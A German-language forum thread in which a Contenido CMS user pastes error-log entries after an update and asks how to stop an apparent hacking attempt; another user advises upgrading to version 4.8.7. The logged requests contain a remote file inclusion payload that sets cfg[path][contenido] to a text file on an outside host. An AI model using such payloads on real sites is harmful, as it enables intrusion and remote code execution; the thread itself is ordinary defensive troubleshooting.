Nach Update Errorlog

rw72 · Beitrag von **rw72** » Fr 1. Aug 2008, 11:35

Hallo,
nach dem Update finde ich folgende Einträge im Errorlog:
[01-Aug-2008 08:11:03] /cms/cms/front_content.php?idcat=31/contenido/classes/class.inuse.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? AN' at line 1
SELECT ARTLANG.idlang, ARTLANG.online, CATLANG.visible FROM con_art_lang AS ARTLANG, con_cat_lang AS CATLANG WHERE ARTLANG.idart = 29 AND CATLANG.idcat = 31/contenido/classes/class.inuse.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? AND ARTLANG.idlang = CATLANG.idlang ORDER BY ARTLANG.idlang ASC
[01-Aug-2008 08:11:03] /cms/cms/front_content.php?idcat=31/contenido/classes/class.inuse.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? next_record called with no query pending in Module ID 45.
[01-Aug-2008 08:11:03] PHP Fatal error: Error: Can't include /srv/www/vhosts/123.de/httpdocs/cms/contenido/classes/class.ExtendedTemplate.php in /srv/www/vhosts/123.de/httpdocs/cms/contenido/includes/api/functions.api.general.php on line 166

Da versucht wohl jemand die Seite zu hacken - wie kann ich das verhindern?

Danke

timo.trautmann_4fb · Beitrag von **timo.trautmann_4fb** » Fr 1. Aug 2008, 11:39

Aktuelle Version von Contenido (4.8.7) installieren wenn noch nicht geschehen. Hackingversuche kann man nicht unterbinden. Wichtig ist nur, dass sie nicht erfolgreich sind.

rw72 · Beitrag von **rw72** » Fr 1. Aug 2008, 12:22

stimmt - nur das ist wichtig

Mit der Version 4.8.7 läuft es.
DANKE